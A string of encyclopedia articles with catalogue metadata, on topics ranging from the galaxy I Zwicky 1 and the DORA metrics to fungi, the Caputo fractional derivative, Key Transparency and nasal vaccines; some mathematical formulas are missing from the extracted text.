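print(round(nu_obs, 3))  # ~108.634 GHz, matching the quoted 108.633 GHz
```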
The CO maps were complemented by observations from the IRAM 30 m telescope. The synthesized beam at uniform weighting was 1.9″, but lower-resolution CLEAN maps (natural weighting) were made at spectral resolutions of 10 km s−1 and 40 km s−1 to examine the extended disk structure and velocity field. For the core component, researchers used the 1.9″-resolution CLEANed maps with a spectral resolution of 20 km s−1. To investigate the structure and dynamics of the nucleus, they used these velocity maps together with position–velocity (p-v) diagrams along the major and minor kinematic axes of I Zwicky 1.
Near-Infrared Spectroscopy and Imaging
I Zwicky 1 was observed in the K band (2.20 μm) in January 1995 with the MPE imaging spectrometer 3D on the 3.5 m telescope at Calar Alto, Spain. The H-band (1.65 μm) observations were carried out in December 1995 at the William Herschel Telescope on La Palma, Canary Islands. In both observations, the image scale was 0.5″ pixel−1 and the total integration time on source was 4200 s and 1530 s for the K band and H band, respectively.
Molecular gas properties
The properties of the molecular gas are important for understanding star formation and the powering of AGNs, given that molecular clouds are the major reservoirs for such activity. Looking at the spiral arms of the QSO host galaxy, researchers detected molecular line emission and were able to decompose it into separate core and disk components. Through analysis of the velocity field, a circumnuclear ring of molecular gas was found, similar in size to starburst rings in nearby galaxies. At a spatial resolution of 1.9″ (2.2 kpc), there is no evidence of gas streaming directly toward the nucleus.
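The arcsecond-to-kiloparsec figures quoted for the beam are just the small-angle relation, physical size = θ(rad) × distance. The sketch below assumes a beam of 1.9 arcsec and an angular-size distance of ~247 Mpc (a low-z Hubble-law estimate divided by 1+z, not a value from the article), so the result is approximate.

```python
# Small-angle conversion: physical size = theta(rad) * distance.
# Beam of ~1.9 arcsec as quoted for the maps; the angular-size distance
# (~247 Mpc, from D_hubble / (1 + z)) is an assumed low-z estimate.

ARCSEC_PER_RAD = 206_265.0
KPC_PER_MPC = 1_000.0

theta_arcsec = 1.9
d_a_mpc = 261.7 / 1.0611  # ~246.6 Mpc (assumption)

size_kpc = theta_arcsec / ARCSEC_PER_RAD * d_a_mpc * KPC_PER_MPC
print(round(size_kpc, 1))  # ~2.3 kpc, close to the quoted 2.2 kpc
```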
Comparison of starburst rings
In a study of starburst rings in galaxies, the rings in I Zwicky 1 are suggested to be formed by gravitational interactions, given the high densities of stars and gas. These rings are detected in the mid-infrared continuum, near-infrared colors, molecular gas line emission, and Hα line emission. Although the overall structure of the rings is uneven, it is feasible that they are formed by two twisted spiral arms on either side of the nucleus. To see whether these rings are unique or ordinary, researchers compared two other galaxies, NGC 7552 and NGC 7469, and found the ring properties to be alike for all three galaxies. There is, however, a difference in total bolometric luminosity, which might be linked to the internal structure of the rings and to the extent to which starburst regions are fueled within the ring region.
The starburst ring of I Zwicky 1 is three times older than those in NGC 7552 and NGC 7469. By this comparison, the molecular ring detected in 12CO(1-0) line emission might host a starburst like other circumnuclear rings. This indicates that the luminosity observed for QSOs and Seyfert galaxies is partly produced by circumnuclear starbursts in the centers of host galaxies, and that the AGNs alone are not responsible for the overall energy output in optical and infrared light. Such star formation activity contributes only about 10 to 50% of the bolometric luminosity in I Zwicky 1, comparable to observations of NGC 7469.
In summary, a young starburst is associated with this circumnuclear ring. The properties of the starburst ring in I Zwicky 1 are similar to those of other sources of nuclear activity. Given these similarities, such rings are possibly a common phenomenon that contributes a significant fraction of the luminosity in the central regions of galaxies.
Supermassive black hole
The supermassive black hole in I Zwicky 1 has an estimated mass of M• = 9.30(+1.26/−1.38) × 10^6 solar masses. This suggests an accretion rate of 203.9(+61.0/−65.8) L_Edd c^−2, indicating a super-Eddington accretor, where L_Edd is the Eddington luminosity and c is the speed of light. By decomposing Hubble Space Telescope images, researchers find the stellar mass of the bulge of its host galaxy to be log(M_bulge/M_☉) = 10.92 ± 0.07. From these values, they suggest a black-hole-to-bulge mass ratio of ~10^−4, which is smaller than in the classical bulges of elliptical galaxies.
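As a quick sanity check on the quoted mass ratio, the two numbers above can be combined directly; a minimal sketch (the printed values are assumed exact as quoted):

```python
import math

# Values quoted above: M_BH ≈ 9.30e6 M_sun and log10(M_bulge/M_sun) = 10.92.
m_bh = 9.30e6
m_bulge = 10 ** 10.92          # ≈ 8.3e10 solar masses
ratio = m_bh / m_bulge
print(f"{ratio:.2e}")          # on the order of 10^-4, as stated
```

This confirms the stated ratio of ~10^−4, well below the ~10^−3 typical of classical bulges.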
An article published in 2021 reported that, according to observations by ESA's XMM-Newton and NASA's NuSTAR space telescopes, the black hole emits X-ray flares from this region. Further analysis by researchers showed brief flashes of photons, consistent with the re-emergence of emission, proving they had reverberated from the black hole's accretion disk in the form of light echoes, which are subsequently distorted and extended by the black hole's strong gravitational field.
References
00545
Pisces (constellation)
Seyfert galaxies
Quasars
Starburst galaxies
03151
IRAS catalogue objects
Markarian galaxies | I Zwicky 1 | ["Astronomy"] | 2,089 | ["Pisces (constellation)", "Constellations"] |
76,969,858 | https://en.wikipedia.org/wiki/Polevitzky%2C%20Johnson%20and%20Associates | Polevitzky, Johnson and Associates was an architectural firm with headquarters in Miami, Florida.
History
Polevitzky, Johnson and Associates, Inc. was established in 1951 in Miami, Florida. After coming back from World War II in the mid-1940s, Igor B. Polevitzky opened a new office in the Brickell neighbourhood and partnered with Verner Johnson.
Illustrator J. M. Smith, Jerome L. Schilling, Samuel S. Block, and William H. Arthur were among the firm's longtime associates. Photographers who worked frequently with the firm included Earl Struck, Jim Forney, Rudi Rada, Ernest Graham, Samuel H. Gottscho, and Robert R. Blanch.
In 1957, Meyer Lansky commissioned the firm's senior partner Igor Polevitzky to design the Hotel Habana Riviera. Along with Verner Johnson and Associates, Polevitzky collaborated with Miguel Gastón and Manuel Carrerá, two architects from Cuba. Built in the Vedado neighborhood of Havana, Cuba, the sixteen-story skyscraper was constructed on the Malecón beachfront boulevard.
The Miami-based architectural firm was brought in to redesign the original Biltmore Yacht and Country Club after the winter of 1957, but the Cuban Revolution stopped it from ever being built.
The founders of Polevitzky, Johnson and Associates disbanded the firm in the mid-1960s. Around 1967, Igor Polevitzky relocated permanently from his Miami home to Estes Park, Colorado. The firm took on projects until the early 1970s.
References
Architecture firms
Architecture organizations
Architecture firms of the United States
Architecture firms based in Florida | Polevitzky, Johnson and Associates | ["Engineering"] | 334 | ["Architecture organizations", "Architecture"] |
76,973,233 | https://en.wikipedia.org/wiki/Quadracaea%20roureae | Quadracaea roureae is a species of fungus in the division Ascomycota. The fungus has specialised cells that produce multiple spores, flask-shaped cells that release spores by breaking open, and a unique way of shedding its spores. The type specimen of this hyphomycetes fungus was found growing on dead branches of Rourea minor in Hainan Bawangling National Nature Reserve. At the time of its original publication, it was only known to occur at the type locality in China.
Description
Quadracaea roureae forms colonies on natural substrates that are spread out, brown in color, and covered in fine hairs. The mycelium, or fungal network, is partly superficial and partly embedded within the substrate. It consists of branched, septate (segmented) hyphae that are pale brown and smooth-walled, measuring 1–2 micrometres (μm) in thickness.
The conidiophores, which are the structures that bear spores, are macronematous (having well-developed stalks) and mononematous (single or unbranched). They can appear singly or in groups, and are straight or slightly curved. These structures are smooth and lighter in colour towards the apex, can grow up to 81 μm long, and are 3–4.5 μm wide. They bear separating cells at various levels.
Conidiogenous cells, which produce the spores, are more or less cylindrical, measuring 6–8.5 μm in length and 2.5–3.5 μm in width. These cells are polyblastic, meaning they produce multiple spores, and are terminal (at the end of the structure) but can become intercalary (inserted along the length). They are pale brown to brown in colour and integrated into the conidiophore structure.
Separating cells are acropleurogenous (producing spores at the tip and along the sides), ampulliform (flask-shaped), and taper towards the apex. After spore release, these cells appear empty with an open end. They are pale brown in colour.
The conidia (asexual spores) are solitary, dry, and obpyriform (pear-shaped). They have three transverse septa and are slightly constricted at these points. Conidia measure 20–26.5 μm in length and 7.5–9.5 μm in width. The basal cell of the conidium is smooth and pale brown, featuring a prominent frill at the base. The second and third cells are thick-walled and dark brown, with the second cell being broader and darker. The apical cell is narrowly conical, pointed, and colourless or nearly so.
The synanamorph (an alternate form) of Quadracaea roureae resembles Selenosporella. The apical cell of each conidial arm produces blastic (budding) conidia that are fusiform (spindle-shaped), slightly curved, aseptate (without septa), and hyaline (glassy). These secondary conidia measure 4.5–5.5 μm in length and 0.6–1 μm in width.
References
Ascomycota
Fungus species
Fungi described in 2012
Fungi of China | Quadracaea roureae | ["Biology"] | 684 | ["Fungi", "Fungus species"] |
76,974,120 | https://en.wikipedia.org/wiki/Quadracaea%20stauroconidia | Quadracaea stauroconidia is a species of fungus in the division Ascomycota. This hyphomycetes fungus was formally described as a new species in 2013. The type specimen was collected by the authors from a locality in Santa Teresinha, Bahia, Brazil, where it was found growing on submerged leaves. The species epithet, stauroconidia, makes reference to the star-shaped conidia (asexual spores).
Description
Quadracaea stauroconidia shares similarities with several related fungal species but can be distinguished by specific characteristics of its reproductive structures. The conidiophores of Q. stauroconidia are unbranched, septate, and erect, ranging in colour from brown at the base to paler towards the apex. These structures measure 84–225 μm in length and 3–9 μm in width.
The conidiogenous cells, which produce the spores, are terminal or intercalary and cylindrical in shape, measuring 12–16.5 μm by 3–3.8 μm. These cells are light brown and can sometimes show percurrent proliferation. The separating cells are single or in clusters of up to five, thin-walled, smooth, and pale brown, with dimensions of 3–6 μm by 3 μm.
The conidia (asexual spores) are solitary, dry, septate, and constricted at the septa. They are smooth, thin-walled, and stauroform (cross-shaped). The central cell is angular and dark brown, measuring 8.5–13 μm by 7.5–11 μm. The apical cells are conical and pale brown, with the first cell measuring 4–5 μm by 6 μm, and the second cell phialidic, measuring 4–5 μm by 3–4.5 μm. There are usually two, sometimes one, lateral cells that are conical and rounded at the top, pale brown, measuring 4–5 μm by 4–6 μm. These lateral cells may sometimes have a middle septum forming a phialidic cell. The basal cell is conical, truncated at the base with a short frill, pale brown, and measures 4–5 μm by 5–6 μm. The phialidic cells produce smooth, falcate, hyaline conidia that lack septa and measure 7.5–9 μm by 0.7–0.9 μm.
References
Ascomycota
Fungus species
Fungi described in 2013
Fungi of Brazil | Quadracaea stauroconidia | ["Biology"] | 535 | ["Fungi", "Fungus species"] |
76,974,432 | https://en.wikipedia.org/wiki/DevOps%20Research%20and%20Assessment | DevOps Research and Assessment (abbreviated to DORA) is a team, part of Google Cloud, that engages in opinion polling of software engineers to conduct research for the DevOps movement.
The DORA team was founded by Nicole Forsgren, Jez Humble and Gene Kim. It initially conducted research for the DevOps company Puppet and later became an independent team (with Puppet continuing to produce reports with a new team).
Whilst the founding members have departed, the DORA team continues to publish research in the form of annual State of DevOps Reports.
State of DevOps Reports
The DORA team began publishing State of DevOps Reports in 2013. The latest DORA State of DevOps Report published in 2023 found culture and a customer centric focus key to success, whilst AI was providing limited benefits.
DORA Four Key Metrics
For the purposes of their research, Four Key Metrics, sometimes referred to as DORA Metrics, are used to assess the performance of teams.
The four metrics are as follows:
Change Lead Time - Time to implement, test, and deliver code for a feature (measured from first commit to deployment)
Deployment Frequency - Number of deployments in a given duration of time
Change Failure Rate - Percentage of failed changes over all changes (regardless of success)
Mean Time to Recovery (MTTR) - Time it takes to restore service after production failure
Using these performance measures, the team are able to assess how practices (like outsourcing) and risk factors impact performance metrics for an engineering team. These metrics can be crudely measured using psychometrics or using commercial services.
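To illustrate how the four measures fall out of raw deployment records, here is a minimal sketch; the record fields (`first_commit`, `deployed`, `failed`, `restored`) and the sample data are hypothetical and not part of any official DORA tooling:

```python
from datetime import datetime
from statistics import mean

# Hypothetical deployment records for one team over a 30-day window.
deployments = [
    {"first_commit": datetime(2024, 1, 1, 9), "deployed": datetime(2024, 1, 1, 17),
     "failed": False, "restored": None},
    {"first_commit": datetime(2024, 1, 3, 10), "deployed": datetime(2024, 1, 4, 10),
     "failed": True, "restored": datetime(2024, 1, 4, 12)},
]

def four_key_metrics(deploys, window_days=30):
    # Change lead time: first commit -> deployment, in hours.
    lead_times = [(d["deployed"] - d["first_commit"]).total_seconds() / 3600
                  for d in deploys]
    failures = [d for d in deploys if d["failed"]]
    # MTTR: failed deployment -> service restored, in hours.
    restores = [(d["restored"] - d["deployed"]).total_seconds() / 3600
                for d in failures if d["restored"]]
    return {
        "change_lead_time_h": mean(lead_times),
        "deployment_frequency": len(deploys) / window_days,   # deploys per day
        "change_failure_rate": len(failures) / len(deploys),  # fraction of all changes
        "mttr_h": mean(restores) if restores else None,
    }

m = four_key_metrics(deployments)
print(m["change_failure_rate"])  # 0.5 for this sample
```

For the sample above, lead time averages 16 hours, half of all changes failed, and the one failure took 2 hours to restore.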
Limitations
These metrics have been used by organisations to evaluate team-by-team performance, a use-case which the DORA team issued a warning against in October 2023.
Some professionals have argued that using the DORA Four Key Metrics as targets within engineering teams encourages focus on the wrong incentives. For example, James Walker, CEO at Curiosity Software, has argued that the "metrics aren’t a definitive route to DevOps success" and has challenged their use for team comparisons.
Research conducted by the computer scientist Junade Ali and the British polling firm Survation found that both software engineers (when building software systems) and public perception (when using software systems) found other factors mattered significantly more than the outcome measures which were treated as the "Four Key Metrics" (which ultimately measure the speed of resolving issues and the speed of fixing bugs, and are used to create the findings in the book), and risk and reward appetite varies from sector-to-sector.
Ali has also criticised the research on the basis that reputable opinion polling firms which comply with the rules of organisations like the British Polling Council publish their full results and raw data tables, which the DORA team did not do. He additionally noted that the sponsors of the polling (Google Cloud and previously Puppet) create products which have a vested interest in having software engineers deliver faster (despite research indicating high levels of burnout amongst software engineers), a position the results of the research ultimately supported. Despite the authors arguing that speed of delivery and software quality go hand-in-hand, Ali has offered several counter-examples, including the comparatively high quality of aviation software despite infrequent changes, contrasted with rapid application development being pioneered in the software that resulted in the British Post Office scandal and agile software development being used in the software responsible for the 2009–2011 Toyota vehicle recalls.
The software developer Bryan Finster has also discussed how, as correlation does not imply causation, organisations who are considered "high performing" in the research are not high performing because they focussed on the DORA metrics, but instead focussed on delivering value to users and arguing the metrics should be used as "trailing indicators for poor health, not indicators everything is going well".
Accelerate (book)
Accelerate: The Science of Lean Software and DevOps: Building and Scaling High Performing Technology Organizations is a software engineering book co-authored by Nicole Forsgren, Jez Humble and Gene Kim from their time in the DORA team. The book explores how software development teams using Lean Software and DevOps can measure their performance and the performance of software engineering teams impacts the overall performance of an organization.
The book discusses their research conducted as part of the DORA team for the annual State of DevOps Reports. In total, the authors considered 23,000 data points from a variety of companies of various different sizes (from start-up to enterprises), for-profit and not-for-profit and both those with legacy systems and those with modern systems.
24 Key Capabilities
The authors outline 24 practices to improve software delivery which they refer to as "key capabilities" and group them into five categories.
Continuous Delivery
Use version control for all production artifacts
Automate your deployment process
Implement Continuous Integration
Use trunk-based development methods
Implement test automation
Support test data management
Shift Left on Security
Implement Continuous Delivery (CD)
Architecture
Use a Loosely Coupled Architecture
Architect for Empowered Teams
Product and Process
Gather and Implement Customer Feedback
Make the Flow of Work Visible through the Value Stream
Work in Small Batches
Foster and Enable Team Experimentation
Lean Management and Monitoring
Have a Lightweight Change Approval Process
Monitor across Application and Infrastructure to Inform Business Decisions
Check System Health Proactively
Improve Processes and Manage Work with Work-In-Process (WIP) Limits
Visualize Work to Monitor Quality and Communicate throughout the Team
Cultural
Support a Generative Culture
Encourage and Support Learning
Support and Facilitate Collaboration among Teams
Provide Resources and Tools that Make Work Meaningful
Support or Embody Transformational Leadership
References
External links
Q&A on the Book Accelerate: Building and Scaling High Performance Technology Organizations
Computer programming books
Computer books | DevOps Research and Assessment | ["Technology"] | 1,151 | ["Works about computing", "Computer books"] |
76,975,056 | https://en.wikipedia.org/wiki/Caputo%20fractional%20derivative | In mathematics, the Caputo fractional derivative, also called Caputo-type fractional derivative, is a generalization of derivatives for non-integer orders named after Michele Caputo. Caputo first defined this form of fractional derivative in 1967.
Motivation
The Caputo fractional derivative is motivated from the Riemann–Liouville fractional integral. Let be continuous on , then the Riemann–Liouville fractional integral states that
where is the Gamma function.
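The formula itself did not survive extraction; for reference, the standard Riemann–Liouville fractional integral of order α (a reconstruction of what presumably stood here) is:

```latex
(I^{\alpha} f)(t) = \frac{1}{\Gamma(\alpha)} \int_{a}^{t} (t-\tau)^{\alpha-1} f(\tau)\,\mathrm{d}\tau, \qquad \alpha > 0.
```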
Let's define , say that and that applies. If then we could say . So if is also , then
This is known as the Caputo-type fractional derivative, often written as .
Definition
The first definition of the Caputo-type fractional derivative was given by Caputo as:
where and .
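The equation was lost in extraction; Caputo's standard definition (a reconstruction, writing n for the smallest integer with n − 1 < α < n) reads:

```latex
({}^{C}\!D^{\alpha} f)(t) = \frac{1}{\Gamma(n-\alpha)} \int_{a}^{t} \frac{f^{(n)}(\tau)}{(t-\tau)^{\alpha+1-n}}\,\mathrm{d}\tau,
\qquad n-1 < \alpha < n,\; n \in \mathbb{N}.
```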
A popular equivalent definition is:
where and is the ceiling function. This can be derived by substituting so that would apply and follows.
Another popular equivalent definition is given by:
where .
The problem with these definitions is that they only allow arguments in . This can be fixed by replacing the lower integral limit with : . The new domain is .
Properties and theorems
Basic properties and theorems
A few basic properties are:
Non-commutation
The index law does not always fulfill the property of commutation:
where .
Fractional Leibniz rule
The Leibniz rule for the Caputo fractional derivative is given by:
where is the binomial coefficient.
Relation to other fractional differential operators
Caputo-type fractional derivative is closely related to the Riemann–Liouville fractional integral via its definition:
Furthermore, the following relation applies:
where is the Riemann–Liouville fractional derivative.
Laplace transform
The Laplace transform of the Caputo-type fractional derivative is given by:
where .
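The transform formula is missing above; the standard result (assuming f sufficiently smooth and lower limit a = 0, with F the Laplace transform of f) is:

```latex
\mathcal{L}\left\{{}^{C}\!D^{\alpha} f\right\}(s) = s^{\alpha} F(s) - \sum_{k=0}^{n-1} s^{\alpha-k-1} f^{(k)}(0),
\qquad n-1 < \alpha \le n.
```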
Caputo fractional derivative of some functions
The Caputo fractional derivative of a constant is given by:
The Caputo fractional derivative of a power function is given by:
The Caputo fractional derivative of an exponential function is given by:
where is the -function and is the lower incomplete gamma function.
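The power rule referred to above (its formula also lost in extraction) is, in the standard form, ^C D^α t^p = Γ(p+1)/Γ(p−α+1) · t^(p−α) for p > n − 1. It can be checked numerically; a minimal sketch for f(t) = t² and α = 1/2, where the function choice and step count are illustrative:

```python
import math

def caputo_half_derivative_t2(t, steps=100000):
    # ^C D^{1/2} of f(t) = t^2: (1/Γ(1/2)) ∫_0^t f'(τ) (t-τ)^{-1/2} dτ.
    # The substitution u = sqrt(t - τ) removes the endpoint singularity:
    # integral = ∫_0^{sqrt(t)} 2 f'(t - u^2) du, with f'(x) = 2x.
    b = math.sqrt(t)
    h = b / steps
    total = 0.0
    for i in range(steps):
        u = (i + 0.5) * h                  # midpoint rule
        total += 2.0 * (2.0 * (t - u * u)) * h
    return total / math.gamma(0.5)

# Closed form from the power rule: Γ(3)/Γ(2.5) · t^{3/2}
t = 2.0
closed = math.gamma(3) / math.gamma(2.5) * t ** 1.5
print(abs(caputo_half_derivative_t2(t) - closed) < 1e-6)  # True
```

The midpoint rule suffices here because the substituted integrand is a polynomial in u.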
References
Further reading
Ricardo Almeida, A Caputo fractional derivative of a function with respect to another function
Fractional calculus | Caputo fractional derivative | ["Mathematics"] | 453 | ["Fractional calculus", "Calculus"] |
76,975,269 | https://en.wikipedia.org/wiki/Turkish%20Journal%20of%20Electrical%20Engineering%20and%20Computer%20Sciences | Turkish Journal of Electrical Engineering and Computer Sciences is a peer-reviewed scientific journal published by the Scientific and Technological Research Council of Turkey (TÜBİTAK). Being a diamond open access journal, it covers all areas of electrical engineering and computer science. Its editor-in-chief is Muhammet Uzuntarla (Gebze Technical University).
Abstracting and indexing
The journal is abstracted and indexed in:
According to the Journal Citation Reports, the journal has a 2023 impact factor of 1.2.
References
External links
English-language journals
7 times per year journals
Academic journals established in 1993
Electrical and electronic engineering journals
Electrical Engineering and Computer Sciences, Turkish Journal of
Computer science journals | Turkish Journal of Electrical Engineering and Computer Sciences | ["Engineering"] | 141 | ["Electrical engineering", "Electronic engineering", "Electrical and electronic engineering journals"] |
76,975,500 | https://en.wikipedia.org/wiki/Frequenz | Frequenz (German for "frequency") is a monthly peer-reviewed scientific journal published by De Gruyter. Established in 1947, it covers fundamental and applied research in radio-frequency engineering, microwave engineering and terahertz technology, as well as wireless communications. Its editor-in-chief is Rolf Jakoby (Technische Universität Darmstadt).
Abstracting and indexing
The journal is abstracted and indexed in:
According to the Journal Citation Reports, the journal has a 2022 impact factor of 1.1.
References
External links
English-language journals
Monthly journals
Academic journals established in 1947
Electrical and electronic engineering journals
De Gruyter academic journals
Electromagnetism journals | Frequenz | ["Engineering"] | 144 | ["Electrical engineering", "Electronic engineering", "Electrical and electronic engineering journals"] |
76,975,616 | https://en.wikipedia.org/wiki/Key%20Transparency | Key Transparency allows communicating parties to verify public keys used in end-to-end encryption. In many end-to-end encryption services, to initiate communication a user will reach out to a central server and request the public keys of the user with which they wish to communicate. If the central server is malicious or becomes compromised, a man-in-the-middle attack can be launched through the issuance of incorrect public keys. The communications can then be intercepted and manipulated. Additionally, legal pressure could be applied by surveillance agencies to manipulate public keys and read messages.
With Key Transparency, public keys are posted to a public log that can be universally audited. Communicating parties can verify public keys used are accurate.
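A common realization of such an auditable log is a Merkle tree, as in Certificate Transparency. The sketch below is illustrative rather than any specific Key Transparency protocol (the function names and the leaf/node domain-separation prefixes are assumptions): it checks that a (user, public-key) record is included under a published log root using only the sibling hashes along its path.

```python
import hashlib

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def leaf_hash(entry: bytes) -> bytes:
    return h(b"\x00" + entry)           # domain-separate leaves from inner nodes

def node_hash(left: bytes, right: bytes) -> bytes:
    return h(b"\x01" + left + right)

def verify_inclusion(root, entry, index, proof):
    """Check that `entry` sits at `index` in a log with Merkle root `root`,
    given the sibling hashes bottom-up in `proof`."""
    acc = leaf_hash(entry)
    for sibling in proof:
        acc = node_hash(acc, sibling) if index % 2 == 0 else node_hash(sibling, acc)
        index //= 2
    return acc == root

# Build a 4-leaf log of (user, public-key) records, then audit one entry.
entries = [b"alice:pkA", b"bob:pkB", b"carol:pkC", b"dave:pkD"]
leaves = [leaf_hash(e) for e in entries]
l01 = node_hash(leaves[0], leaves[1])
l23 = node_hash(leaves[2], leaves[3])
root = node_hash(l01, l23)
proof_for_bob = [leaves[0], l23]        # siblings along bob's path to the root
print(verify_inclusion(root, b"bob:pkB", 1, proof_for_bob))  # True
```

A server that substituted a different key for bob would change the leaf hash and fail this check against the published root, which is what makes the manipulation described above detectable.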
See also
Certificate Transparency
References
Cryptography
End-to-end encryption
Public-key cryptography | Key Transparency | ["Mathematics", "Engineering"] | 162 | ["Applied mathematics", "Cryptography", "Cybersecurity engineering"] |
76,975,879 | https://en.wikipedia.org/wiki/Debate%20between%20tree%20and%20reed | The Debate between tree and reed (CSL 5.3.4) is a work of Sumerian literature belonging to the genre of disputation poems. It was written on clay tablets and dates to the Third Dynasty of Ur (ca. late 3rd millennium BC). The text was reconstructed by M. Civil in the 1960s from 24 manuscripts, but it is currently the least studied of the disputation poems and a full translation has not yet been published. Some other Sumerian disputations include the dispute between bird and fish, cattle and grain, and Summer and Winter.
Synopsis
The poem begins with a cosmogonic prologue describing the copulation between Heaven (An) and Earth (Ki). Earth gives birth to vegetation, and for the purpose of the poem, this prominently includes Tree and Reed. Though they are first in harmony, a disputation begins between the two as they enter into a shrine. Reed, who fails to respect the proper order of things, steps in front of Tree, causing the latter to be infuriated. The prologue covers the first 49 lines, after which the disputation proceeds for another two hundred lines. It is divided into four speeches: Tree speaking (lines 50–91), Reed speaking (96–137), Tree speaking again (144–191), Reed speaking again (197–228). The adjudication scene (230–254) begins with Tree invoking the judgement of Shulgi (a king), who declares that Tree has prevailed over Reed. The poem also mentions the king Puzrish-Dagan, suggesting its composition during his time.
Partial translation
The following translation of the introductory cosmogonic section of the Disputation, containing only the first 10 lines, is taken from Lisman 2013. The first 25 lines were published by Van Dijk in 1965, but a translation of the entire text has still not been made.

1 The large surface of the earth introduced herself; then she has embellished herself as with a bardul-garment.
2 The vast earth has filled her exterior with precious metals and lapis lazuli.
3 With diorite, nir-stone, cornelian, and suduaga she has adorned herself.
4 The earth, the fragrant vegetation, covered herself with attractiveness. She stood in her magnificence.
5 The pure earth, the virgin earth, has beautified herself for the holy An.
6 An, the exalted heaven, had intercourse with the vast earth.
7 He poured the seed of the hero's Tree and Reed into her womb.
8 The whole earth, the fecund cow, took the good seed of An under her care.
9 The earth, life-giving vegetation, innerly happy, devoted herself to the production of it (i.e. the vegetation).
10 The earth, full of joy, bore abundance, while juice and syrup gave out their smell.
Historical context
In Mesopotamian disputation literature, debates between trees is a recurring theme. In Akkadian disputations, examples include the Tamarisk and Palm, Palm and Vine, and Series of the Poplar. A much later example from Aesop's fables is The Oak and the Reed.
References
Citations
Sources
Clay tablets
Comparative mythology
Creation myths
Mesopotamian myths
Religious cosmologies
Sumerian disputations | Debate between tree and reed | ["Astronomy"] | 694 | ["Cosmogony", "Creation myths"] |
76,976,005 | https://en.wikipedia.org/wiki/Crystallographic%20Society%20of%20Japan | The Crystallographic Society of Japan (日本結晶学会 in Japanese) is a scientific organization in Japan focused on research and education in crystallography. It was established on May 13, 1950, with Shoji Nishikawa as the founding president, and it is an independent academic society. The core publication of the society is the Journal of the Crystallographic Society of Japan, which was first issued in 1959.
The society is affiliated with the International Union of Crystallography and the Asian Crystallographic Association.
See also
Chemical Society of Japan
International Union of Crystallography
German Crystallographic Society
References
Scientific organizations based in Japan
Professional associations based in Japan
Crystallography organizations
Scientific organizations established in 1950 | Crystallographic Society of Japan | ["Chemistry", "Materials_science"] | 144 | ["Crystallography stubs", "Materials science stubs", "Crystallography", "Crystallography organizations"] |
76,977,700 | https://en.wikipedia.org/wiki/Jennifer%20Key | Jennifer Denise Key (née Hicks) is a retired South African mathematician whose research has concerned the interconnections between group theory, finite geometry, combinatorial designs, and coding theory. She is a professor emeritus at Clemson University in the US, and an honorary professor at Aberystwyth University in the UK and at the University of KwaZulu-Natal and the University of the Western Cape in South Africa.
Education and career
Key graduated with honours from the University of the Witwatersrand in 1963, and went to the University of London for graduate study in mathematics, earning a master's degree in 1967 and completing her Ph.D. in 1969. Her dissertation, Some Topics in Finite Permutation Groups, was supervised by Ascher Wagner.
She worked as an academic in England, at the University of Surrey, University of Reading, University of Manchester, and University of Birmingham, before moving to the US in 1990 to take a faculty position at Clemson University. She retired as professor emeritus in 2007.
Book
Key is the author, with Edward F. Assmus Jr., of the book Designs and Their Codes (Cambridge University Press, 1992).
References
External links
Home page
Year of birth missing (living people)
Living people
South African mathematicians
South African women scientists
Women mathematicians
Coding theorists
Combinatorialists
Group theorists
University of Johannesburg alumni
Alumni of the University of London
Academics of the University of Surrey
Academics of the University of Reading
Academics of the University of Manchester
Academics of the University of Birmingham
Clemson University faculty | Jennifer Key | ["Mathematics"] | 305 | ["Combinatorialists", "Combinatorics"] |
65,368,595 | https://en.wikipedia.org/wiki/Nasal%20vaccine | A nasal vaccine is a vaccine administered through the nose that stimulates an immune response without an injection. It induces immunity through the inner surface of the nose, a surface that naturally comes in contact with many airborne microbes. Nasal vaccines are emerging as an alternative to injectable vaccines because they do not use needles and can be introduced through the mucosal route. Nasal vaccines can be delivered through nasal sprays to prevent respiratory infections, such as influenza.
History
Nasal inoculation dates as far back as the 17th century in China during the Kangxi Emperor’s reign. Documentation during this period indicates that the Kangxi Emperor vaccinated his family, army, and others for mild smallpox. Manuals detailing vaccination techniques at the time all focused on sending smallpox up the nose of the individual being vaccinated. Although other vaccination techniques were developed using an infected individual’s scabs, a common method was to place a cotton swab with the fluid from an infected person’s pustule up the nose.
Following smallpox, influenza became a prominent focus of nasal vaccine development. The first live attenuated influenza vaccine (LAIV) in the form of a nasal spray was created in Russia by the Institute of Experimental Medicine in 1987 and was based on the Russian LAIV backbone; nasal vaccines since then have been based on other LAIV backbones. The first nasal influenza vaccine was released in the United States in 2001 but was taken off the market due to toxicity concerns. FluMist, one of the most prominent nasal LAIVs, was released in 2003 as nasal LAIVs continued to develop.
Anthrax attacks at the beginning of the 21st century caused a demand for nasal vaccine development. As anthrax is an airborne substance that can be inhaled, a nasal vaccine has the potential to be used to protect individuals from the effects it can have on the respiratory system. Following the September 11, 2001 terrorist attacks in the United States, several individuals at news stations and U.S. senators died after being sent letters with anthrax as an act of bioterrorism. Nasal vaccine research and development against anthrax was encouraged by the U.S. government in an effort to vaccinate troops. BioThrax, the current anthrax vaccine that is licensed and administered in the United States, requires up to five intramuscular injections and annual boosters; research within the past decade has developed an alternative nasal vaccine that follows the path of infection for anthrax and induces both humoral and cellular immune responses.
The global COVID-19 pandemic led to a rise in nasal vaccines against coronavirus. International efforts for vaccine development occurred as countries such as India, Iran, Russia, and China created nasal COVID-19 vaccines.
Administration
Nasal vaccines are a subsection of mucosal immunization as they use a mucosal route for vaccine delivery. As many pathogens can enter the body through the nose, nasal vaccines take advantage of this mechanism to deliver the vaccine. The nose has multiple lines of defense to prevent pathogens from entering further into the body. Nasal hairs are the first defense as they are at the entrance of the nose and prevent large particles from entering. The mucus layer in the nasal cavity can trap smaller particles that get past the nose hairs. The nasal cavity has a large vascularization network so particles can go through the epithelial layer and directly enter the bloodstream. Intruding particles will interact with the mucosal immune system if they reach the nasal mucosa. The mucosal immune system is composed of lymphoid tissue, B cells, T cells, and antigen-presenting cells. These different types of cells work together to identify intruding particles and trigger an immune response. Nasal vaccines must overcome these barriers and get clearance to deliver the viral antigen to patients.
Nasal vaccines can come in different forms such as solutions (liquids), powders, gels, and solid inserts. The most prevalent type of nasal vaccine in research and clinical application is solutions due to its ease of use. Although solutions are usually pipetted into test subjects’ nostrils when conducting animal trials for nasal vaccines, nasal sprays are considered the most practical approach for mass human vaccination using nasal vaccines. A nasal spray is able to bypass the initial layers of the nasal mucosa and deliver the vaccine particles directly to the mucoadhesive layer. The antigen in the nasal vaccine can then trigger an immune response and prevent infection due to nasal vaccines’ accessibility to the immune system.
